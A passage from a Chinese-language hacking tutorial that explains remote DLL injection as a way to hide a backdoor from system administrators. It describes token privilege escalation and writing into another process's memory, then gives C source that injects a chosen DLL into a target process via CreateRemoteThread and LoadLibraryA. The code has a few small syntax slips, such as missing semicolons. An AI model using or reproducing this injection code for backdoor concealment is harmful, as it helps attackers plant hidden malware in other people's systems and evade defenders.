c. 远程注入DLL
没错,现在讨论的就是传说中的远程注入技术,目前一种非常流行的隐藏技术,因为它没有进程,而前面讨论的两种方法都会有进程出现,因此,有经验的管理员很容易发现,然后先杀进程,在找出后门文件删除。要实现远程注入,我们要编写两个程序,一个是后门文件,这里不是把它写成.exe文件,而是写成.dll文件,在这里先说一下.dll文件,.dll文件,其实就是动态连接库,它里面装封了提供.exe文件调用的函数,一般情况下,双击它,是不能运行它的,它只能由.exe来调用,于是就有了远程注入了,原理很简单:我们把后门的主要功能写成一个函数,然后装封到.dl文件中,然后再另外写一个执行文件来启动它,这样就不会有后门的进程了。那远程注入又指什么呢?这个问题问得好,一般情况下,每个进程都有自己的私有空间,理论上,别的进程是不允许对这个私人空间进行操作的,但是,我们可以利用一些方法进入这个空间并进行操作,将自己的代码写入正在运行的进程中,于是就有了远程注入了。
对dll后门的编写就不作过多的讨论了,现在来看实现注入功能的可执行文件的编写:
用到的函数有:
OpenProcessToken();
LookupPrivilegeValue();
AdjustTokenPrivileges();
OpenProcess();
VirtualAllocEx();
WriteProcessMemory();
GetProcAddress();
CreateRemoteThread();
先简单的介绍以下这些函数的作用,因为我们要操作的是系统中的其他进程,如果没有足够的系统权限,我们是无法写入甚至连读取其它进程的内存地址的,所以我们就需要提升自己的权限,用到以下3个函数
OpenProcessToken(); //打开进程令牌
LookupPrivilegeValue();//返回一个本地系统独一无二的ID,用于系统权限更改
AdjustTokenPrivileges();//从英文意思也能看出它是更改进程权限用的吧?
进入宿主进程的内存空间
在拥有了进入宿主进程空间的权限之后,我们就需要在其内存加入让它加载我们后门的代码了,用LoadLibraryA()函数就可以加载我们的DLL了,它只需要DLL文件的路径就可以了,在这里我们要把DLL文件的路径写入到宿主的内存空间里,因为DLL的文件路径并不存在于宿主进程内存空间了,用到的函数有:
OpenProcess();//用于修改宿主进程的一些属性,详细参看MSDN
VirtualAllocEx();//用于在宿主内存空间中申请内存空间以写入DLL的文件名
WriteProcessMemory();//往申请到的空间中写入DLL的文件名
在宿主中启动新的线程
用的是LoadLibraryA()函数来加载,但在使用LoadLibraryA()之前必须知道它的入口地址,所以用GetProcAdress来获得它的入口地址,有了它的地址以后,就可以用CreateRemoteThread()函数来启动新的线程了,到次,整个注入过程完成,不过还不非常完善,这就留给聪明的你来完成了;)。
简单的例子:
#include "stdafx.h"
int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
//打开进程令牌环
OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken);
//获得进程本地唯一ID
LookupPrivilegeValue(NULL,name,&luid)
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
//调整权限
AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
return 0;
}
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
HANDLE hRemoteProcess;
EnableDebugPriv(SE_DEBUG_NAME)
//打开远程线程
hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允许远程创建线程PROCESS_VM_OPERATION | //允许远程VM操作
PROCESS_VM_WRITE,//允许远程VM写
FALSE, dwRemoteProcessId );
char *pszLibFileRemote;
//使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间
pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1,
MEM_COMMIT, PAGE_READWRITE);
//使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间
WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL);
//计算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
//启动远程线程LoadLibraryA,通过远程线程调用创建新的线程
HANDLE hRemoteThread;
if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL)
{
printf("CreateRemoteThread error!/n");
return FALSE;
}
return TRUE;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InjectDll("c:/zrqfzr.dll",3060) //这个数字是你想注入的进程的ID号
return 0;
}